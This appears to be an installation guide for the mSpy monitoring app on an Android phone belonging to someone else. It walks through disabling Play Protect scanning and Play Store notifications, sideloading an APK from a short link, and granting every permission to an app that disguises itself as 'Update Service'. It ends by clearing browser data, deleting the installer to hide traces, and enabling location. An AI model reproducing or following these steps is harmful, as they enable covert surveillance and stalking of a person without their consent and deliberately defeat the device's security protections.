Disable PlayProtect on the device you want to monitor
1. Go to 'Play Store'.
2. Tap 'Menu button' (three lines in the top left corner).
3. Find and tap 'Play Protect'.
4. 'Settings (cogwheel)'.
5. Disable 'Scan device for security threats'.
6. Go to 'Settings' ⭢ 'Apps' ⭢ 'Google Play Store' ⭢ 'Notifications' ⭢ disable 'Show notifications'.
Download mSpy installer
1. 'Open a browser' (Chrome).
2. Tap on the address bar.
3. Enter the link 'b55y.net/a' and press 'Go'.
4. Draw the shape, once successful click 'Download' → 'Ok'.
5. Hit 'Open' ⭢ 'Settings' ⭢ 'Allow from this source'.
6. Go back ⭢ hit 'Install' ⭢ 'Open'.
1. Tap 'Allow' for all permissions.
2. Tap 'Ok' → turn on the toggle on the next screen.
3. Tap 'Ok' → enable 'Framework update service'.
4. Tap 'Ok' ⭢ 'Update Service' ⭢ enable 'Permit usage access'.
5. Tap 'Ok' ⭢ 'Start now'.
6. Tap 'Ok'. Find and enable 'Update Service'.
7. Tap 'Ok' ⭢ Turn off the first toggle.
8. Click on the area above 'Complete installation' and enter the registration code. Here is how you can find the Registration code.
9. Press 'Complete installation'.
10. Go to 'Settings' ⭢ 'Apps' ⭢ 'Update service' ⭢ 'Data usage' ⭢ enable 'Unrestricted data usage'
1. Go to 'Chrome' → tap on three dots → 'Settings'.
2. Go to 'Privacy' → 'Clear browsing data' → 'Clear data'.
3. Go to the home screen and find the 'File Manager'.
4. Go to 'APKs' → delete 'bt.apk'.
Turn on Location
Touch the screen in two places and pull down the extended menu from the top of the screen → 'Enable Location'.